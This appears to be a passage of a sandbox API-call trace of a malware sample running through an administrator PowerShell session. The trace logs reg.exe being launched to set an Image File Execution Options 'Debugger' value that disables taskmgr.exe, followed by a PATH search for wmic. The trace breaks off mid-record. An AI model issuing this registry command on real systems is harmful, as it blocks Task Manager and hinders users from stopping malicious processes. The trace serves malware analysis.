ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 0x2666a0 [0202.911] FindNextFileW (in: hFindFile=0x2666a0, lpFindFileData=0x1c89dad0 | out: lpFindFileData=0x1c89dad0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x0, dwReserved1=0x0, cFileName="reg.exe", cAlternateFileName="")) returned 0 [0202.911] FindClose (in: hFindFile=0x2666a0 | out: hFindFile=0x2666a0) returned 1 [0202.911] SetErrorMode (uMode=0x1) returned 0x1 [0202.911] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\reg.exe", nBufferLength=0x105, lpBuffer=0x1c89dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\reg.exe", lpFilePart=0x0) returned 0x1b [0202.911] SetErrorMode (uMode=0x1) returned 0x1 [0202.911] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c89ddf0 | out: lpFileInformation=0x1c89ddf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x502c3bef, ftCreationTime.dwHighDateTime=0x1ca0411, ftLastAccessTime.dwLowDateTime=0x502c3bef, ftLastAccessTime.dwHighDateTime=0x1ca0411, ftLastWriteTime.dwLowDateTime=0xedd81bd0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x12400)) returned 1 [0202.911] SetErrorMode (uMode=0x1) returned 0x1 [0202.912] CoTaskMemAlloc (cb=0x1d) returned 0x1b851e90 [0202.912] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x1c89dfd8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c89dfd8) returned 0x4550 [0202.913] CoTaskMemFree (pv=0x1b851e90) [0202.913] GetConsoleWindow () returned 0x40270 [0202.913] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0202.913] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.913] CoTaskMemFree (pv=0x2e4780) [0202.914] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0202.914] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.914] CoTaskMemFree (pv=0x2e4780) [0202.914] CommandLineToArgvW (in: lpCmdLine=" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"", pNumArgs=0x1c89e020 | out: pNumArgs=0x1c89e020) returned 0x282bb0*="" [0202.914] lstrlenW (lpString="ADD") returned 3 [0202.914] CoTaskMemAlloc (cb=0xa) returned 0x274970 [0202.914] RtlMoveMemory (in: Destination=0x274970, Source=0x282c0a, Length=0x8 | out: Destination=0x274970) [0202.914] CoTaskMemFree (pv=0x274970) [0202.914] lstrlenW (lpString="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe") returned 90 [0202.914] CoTaskMemAlloc (cb=0xb8) returned 0x2f15b0 [0202.914] RtlMoveMemory (in: Destination=0x2f15b0, Source=0x282c12, Length=0xb6 | out: Destination=0x2f15b0) [0202.914] CoTaskMemFree (pv=0x2f15b0) [0202.914] lstrlenW (lpString="/f") returned 2 [0202.914] CoTaskMemAlloc (cb=0x8) returned 0x28f240 [0202.914] RtlMoveMemory (in: Destination=0x28f240, Source=0x282cc8, Length=0x6 | out: Destination=0x28f240) [0202.914] CoTaskMemFree (pv=0x28f240) [0202.914] lstrlenW (lpString="/v") returned 2 [0202.914] CoTaskMemAlloc (cb=0x8) returned 0x28f240 [0202.914] RtlMoveMemory (in: Destination=0x28f240, Source=0x282cce, Length=0x6 | out: Destination=0x28f240) [0202.914] CoTaskMemFree (pv=0x28f240) [0202.914] lstrlenW (lpString="Debugger") returned 8 [0202.914] CoTaskMemAlloc (cb=0x14) returned 0x274970 [0202.914] RtlMoveMemory (in: Destination=0x274970, Source=0x282cd4, Length=0x12 | out: Destination=0x274970) [0202.914] CoTaskMemFree (pv=0x274970) [0202.914] lstrlenW (lpString="/t") returned 2 [0202.914] CoTaskMemAlloc (cb=0x8) returned 0x28f240 [0202.914] RtlMoveMemory (in: Destination=0x28f240, Source=0x282ce6, Length=0x6 | out: Destination=0x28f240) [0202.914] CoTaskMemFree (pv=0x28f240) [0202.914] lstrlenW (lpString="REG_SZ") returned 6 [0202.915] CoTaskMemAlloc (cb=0x10) returned 0x274970 [0202.915] RtlMoveMemory (in: Destination=0x274970, Source=0x282cec, Length=0xe | out: Destination=0x274970) [0202.915] CoTaskMemFree (pv=0x274970) [0202.915] lstrlenW (lpString="/d") returned 2 [0202.915] CoTaskMemAlloc (cb=0x8) returned 0x28f240 [0202.915] RtlMoveMemory (in: Destination=0x28f240, Source=0x282cfa, Length=0x6 | out: Destination=0x28f240) [0202.915] CoTaskMemFree (pv=0x28f240) [0202.915] lstrlenW (lpString="Hotkey Disabled") returned 15 [0202.915] CoTaskMemAlloc (cb=0x22) returned 0x1b851e90 [0202.915] RtlMoveMemory (in: Destination=0x1b851e90, Source=0x282d00, Length=0x20 | out: Destination=0x1b851e90) [0202.915] CoTaskMemFree (pv=0x1b851e90) [0202.915] LocalFree (hMem=0x282bb0) returned 0x0 [0202.915] CoTaskMemAlloc (cb=0x804) returned 0x1b8650b0 [0202.915] GetConsoleTitleW (in: lpConsoleTitle=0x1b8650b0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48 [0202.915] CoTaskMemFree (pv=0x1b8650b0) [0202.916] CoTaskMemAlloc (cb=0x15e) returned 0x29c100 [0202.916] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1c89df80*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ff3b50 | out: lpCommandLine="\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\taskmgr.exe\" /f /v Debugger /t REG_SZ /d \"Hotkey Disabled\"", lpProcessInformation=0x2ff3b50*(hProcess=0x468, hThread=0x464, dwProcessId=0x630, dwThreadId=0xa50)) returned 1 [0202.919] CoTaskMemFree (pv=0x29c100) [0202.919] CloseHandle (hObject=0x464) returned 1 [0202.919] CoTaskMemAlloc (cb=0x1d) returned 0x1b851e90 [0202.919] SHGetFileInfoA (in: pszPath="C:\\Windows\\system32\\reg.exe", dwFileAttributes=0x0, psfi=0x1c89e028, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c89e028) returned 0x4550 [0202.920] CoTaskMemFree (pv=0x1b851e90) [0202.920] GetCurrentProcess () returned 0xffffffffffffffff [0202.920] GetCurrentProcess () returned 0xffffffffffffffff [0202.920] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x468, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c89e108, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c89e108*=0x464) returned 1 [0203.204] CloseHandle (hObject=0x464) returned 1 [0203.204] GetExitCodeProcess (in: hProcess=0x468, lpExitCode=0x1c89e178 | out: lpExitCode=0x1c89e178*=0x0) returned 1 [0203.204] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0203.207] CloseHandle (hObject=0x468) returned 1 [0203.207] SetEvent (hEvent=0x434) returned 1 [0203.207] SetEvent (hEvent=0x428) returned 1 [0203.207] SetEvent (hEvent=0x42c) returned 1 [0203.207] SetEvent (hEvent=0x430) returned 1 [0203.208] SetEvent (hEvent=0x444) returned 1 [0203.208] SetEvent (hEvent=0x438) returned 1 [0203.208] SetEvent (hEvent=0x43c) returned 1 [0203.208] SetEvent (hEvent=0x440) returned 1 [0203.208] SetEvent (hEvent=0x448) returned 1 [0203.208] CoUninitialize () Thread: id = 149 os_tid = 0x548 [0203.287] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0203.290] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0203.291] VirtualQuery (in: lpAddress=0x1c7bd620, lpBuffer=0x1c7be4e0, dwLength=0x30 | out: lpBuffer=0x1c7be4e0*(BaseAddress=0x1c7bd000, AllocationBase=0x1be30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.293] VirtualQuery (in: lpAddress=0x1c7bd8d0, lpBuffer=0x1c7be790, dwLength=0x30 | out: lpBuffer=0x1c7be790*(BaseAddress=0x1c7bd000, AllocationBase=0x1be30000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.296] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0203.296] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.296] CoTaskMemFree (pv=0x2e4780) [0203.296] CoTaskMemAlloc (cb=0x104) returned 0x2e4780 [0203.296] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x2e4780, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.296] CoTaskMemFree (pv=0x2e4780) [0203.297] CoTaskMemAlloc (cb=0x20e) returned 0x2fc690 [0203.297] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2fc690 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0203.297] CoTaskMemFree (pv=0x2fc690) [0203.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.298] SetErrorMode (uMode=0x1) returned 0x1 [0203.298] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.ps1", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.298] SetErrorMode (uMode=0x1) returned 0x1 [0203.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.299] SetErrorMode (uMode=0x1) returned 0x1 [0203.299] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psm1", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.299] SetErrorMode (uMode=0x1) returned 0x1 [0203.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.299] SetErrorMode (uMode=0x1) returned 0x1 [0203.299] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.psd1", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.300] SetErrorMode (uMode=0x1) returned 0x1 [0203.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.300] SetErrorMode (uMode=0x1) returned 0x1 [0203.300] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.COM", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.300] SetErrorMode (uMode=0x1) returned 0x1 [0203.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.301] SetErrorMode (uMode=0x1) returned 0x1 [0203.301] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.EXE", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.301] SetErrorMode (uMode=0x1) returned 0x1 [0203.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.302] SetErrorMode (uMode=0x1) returned 0x1 [0203.302] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.302] SetErrorMode (uMode=0x1) returned 0x1 [0203.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.303] SetErrorMode (uMode=0x1) returned 0x1 [0203.303] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.303] SetErrorMode (uMode=0x1) returned 0x1 [0203.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.303] SetErrorMode (uMode=0x1) returned 0x1 [0203.303] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.304] SetErrorMode (uMode=0x1) returned 0x1 [0203.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.304] SetErrorMode (uMode=0x1) returned 0x1 [0203.304] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.304] SetErrorMode (uMode=0x1) returned 0x1 [0203.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.305] SetErrorMode (uMode=0x1) returned 0x1 [0203.305] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.305] SetErrorMode (uMode=0x1) returned 0x1 [0203.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.305] SetErrorMode (uMode=0x1) returned 0x1 [0203.306] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.306] SetErrorMode (uMode=0x1) returned 0x1 [0203.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.306] SetErrorMode (uMode=0x1) returned 0x1 [0203.306] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.307] SetErrorMode (uMode=0x1) returned 0x1 [0203.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.307] SetErrorMode (uMode=0x1) returned 0x1 [0203.307] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.307] SetErrorMode (uMode=0x1) returned 0x1 [0203.307] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.308] SetErrorMode (uMode=0x1) returned 0x1 [0203.308] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.308] SetErrorMode (uMode=0x1) returned 0x1 [0203.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0203.308] SetErrorMode (uMode=0x1) returned 0x1 [0203.308] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.309] SetErrorMode (uMode=0x1) returned 0x1 [0203.309] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.309] SetErrorMode (uMode=0x1) returned 0x1 [0203.309] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.309] SetErrorMode (uMode=0x1) returned 0x1 [0203.310] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.310] SetErrorMode (uMode=0x1) returned 0x1 [0203.310] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.310] SetErrorMode (uMode=0x1) returned 0x1 [0203.310] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.310] SetErrorMode (uMode=0x1) returned 0x1 [0203.311] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0203.311] SetErrorMode (uMode=0x1) returned 0x1 [0203.311] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bd660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0203.311] SetErrorMode (uMode=0x1) returned 0x1 [0203.311] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c7bd800 | out: lpFindFileData=0x1c7bd800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 